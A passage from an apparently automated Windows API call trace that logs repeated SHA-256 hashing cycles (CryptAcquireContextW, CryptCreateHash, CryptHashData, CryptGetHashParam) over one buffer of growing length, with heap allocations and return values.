szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821ed0) returned 1 [0175.932] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.932] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x700, dwFlags=0x0) returned 1 [0175.932] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.932] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a830 [0175.932] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a830, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a830, pdwDataLen=0xcdfdc) returned 1 [0175.932] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.932] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0175.932] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0175.933] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.933] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x720, dwFlags=0x0) returned 1 [0175.933] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a1d0 [0175.933] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a1d0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a1d0, pdwDataLen=0xcdfdc) returned 1 [0175.933] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.933] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0175.933] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0175.933] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.933] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x740, dwFlags=0x0) returned 1 [0175.933] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.933] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a020 [0175.933] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a020, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a020, pdwDataLen=0xcdfdc) returned 1 [0175.933] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.933] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0175.933] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338226d0) returned 1 [0175.934] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.934] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x760, dwFlags=0x0) returned 1 [0175.934] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.934] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a950 [0175.934] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a950, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a950, pdwDataLen=0xcdfdc) returned 1 [0175.934] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.934] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0175.934] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0175.935] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.935] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x780, dwFlags=0x0) returned 1 [0175.935] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a200 [0175.935] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a200, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a200, pdwDataLen=0xcdfdc) returned 1 [0175.935] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.935] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0175.935] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338220d0) returned 1 [0175.935] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.935] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0175.935] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.935] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a770 [0175.935] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a770, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a770, pdwDataLen=0xcdfdc) returned 1 [0175.935] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.935] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0175.935] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822bd0) returned 1 [0175.936] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.936] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0175.936] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.936] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a8c0 [0175.936] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a8c0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a8c0, pdwDataLen=0xcdfdc) returned 1 [0175.936] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.936] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0175.936] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338236d0) returned 1 [0175.937] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.937] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0175.937] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.937] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a530 [0175.937] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a530, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a530, pdwDataLen=0xcdfdc) returned 1 [0175.937] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.937] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0175.937] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338235d0) returned 1 [0175.937] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.937] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x800, dwFlags=0x0) returned 1 [0175.937] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.937] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a0e0 [0175.937] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a0e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a0e0, pdwDataLen=0xcdfdc) returned 1 [0175.937] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.937] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0175.937] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338234d0) returned 1 [0175.938] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.938] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x820, dwFlags=0x0) returned 1 [0175.938] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.938] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aad0 [0175.938] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6aad0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6aad0, pdwDataLen=0xcdfdc) returned 1 [0175.938] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.938] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0175.938] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822dd0) returned 1 [0175.939] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.939] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x840, dwFlags=0x0) returned 1 [0175.939] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a980 [0175.939] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a980, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a980, pdwDataLen=0xcdfdc) returned 1 [0175.939] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.939] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0175.939] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.939] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.939] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x860, dwFlags=0x0) returned 1 [0175.939] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.939] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a7a0 [0175.939] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a7a0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a7a0, pdwDataLen=0xcdfdc) returned 1 [0175.939] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.939] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.939] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338223d0) returned 1 [0175.940] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.940] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x880, dwFlags=0x0) returned 1 [0175.940] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.940] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a9b0 [0175.940] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a9b0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a9b0, pdwDataLen=0xcdfdc) returned 1 [0175.940] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.940] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0175.940] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33821fd0) returned 1 [0175.941] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.941] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0175.941] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.941] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a380 [0175.941] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a380, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a380, pdwDataLen=0xcdfdc) returned 1 [0175.941] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.941] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0175.941] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338225d0) returned 1 [0175.942] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.942] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0175.942] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.942] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a860 [0175.942] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a860, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a860, pdwDataLen=0xcdfdc) returned 1 [0175.942] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.942] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0175.942] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.942] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.942] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0175.942] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.942] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a470 [0175.942] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a470, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a470, pdwDataLen=0xcdfdc) returned 1 [0175.942] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.942] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0175.942] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338228d0) returned 1 [0175.943] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.943] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x900, dwFlags=0x0) returned 1 [0175.943] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.943] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a560 [0175.943] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a560, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a560, pdwDataLen=0xcdfdc) returned 1 [0175.943] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.943] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0175.943] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338222d0) returned 1 [0175.944] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.944] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x920, dwFlags=0x0) returned 1 [0175.944] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.944] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a8f0 [0175.944] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a8f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a8f0, pdwDataLen=0xcdfdc) returned 1 [0175.944] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.944] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0175.944] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338227d0) returned 1 [0175.944] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.944] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x940, dwFlags=0x0) returned 1 [0175.944] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.944] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a9e0 [0175.944] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e6a9e0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a9e0, pdwDataLen=0xcdfdc) returned 1 [0175.944] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0175.944] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0175.944] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822ed0) returned 1 [0175.945] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.945] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x960, dwFlags=0x0) returned 1 [0175.945] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.945] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ab30 [0175.945] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6ab30, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6ab30, pdwDataLen=0xcdfdc) returned 1 [0175.945] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.945] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0175.945] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338232d0) returned 1 [0175.946] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.946] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x980, dwFlags=0x0) returned 1 [0175.946] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.946] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6aa40 [0175.946] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6aa40, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6aa40, pdwDataLen=0xcdfdc) returned 1 [0175.946] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.946] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0175.946] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33822cd0) returned 1 [0175.946] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.946] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0175.946] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.946] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a230 [0175.946] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a230, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a230, pdwDataLen=0xcdfdc) returned 1 [0175.946] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.946] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0175.946] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x33823ad0) returned 1 [0175.947] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.947] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0175.947] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.947] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a5f0 [0175.947] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e6a5f0, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a5f0, pdwDataLen=0xcdfdc) returned 1 [0175.947] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0175.947] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0175.947] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338233d0) returned 1 [0175.948] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.948] CryptHashData (hHash=0x332b7ac0, pbData=0x32e5fa80, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0175.948] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.948] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a920 [0175.948] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e6a920, pdwDataLen=0xcdfdc, dwFlags=0x0 | out: pbData=0x32e6a920, pdwDataLen=0xcdfdc) returned 1 [0175.948] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0175.948] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0175.948] CryptAcquireContextW (in: phProv=0xcdff0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcdff0*=0x338231d0) returned 1 [0175.948] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcdfe0 | out: phHash=0xcdfe0) returned 1 [0175.948] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0175.948] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcdfdc, pdwDataLen=0xcdfec, dwFlags=0x0 | out: pbData=0xcdfdc, pdwDataLen=0xcdfec) returned 1 [0175.948] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6a260 [0175.948] 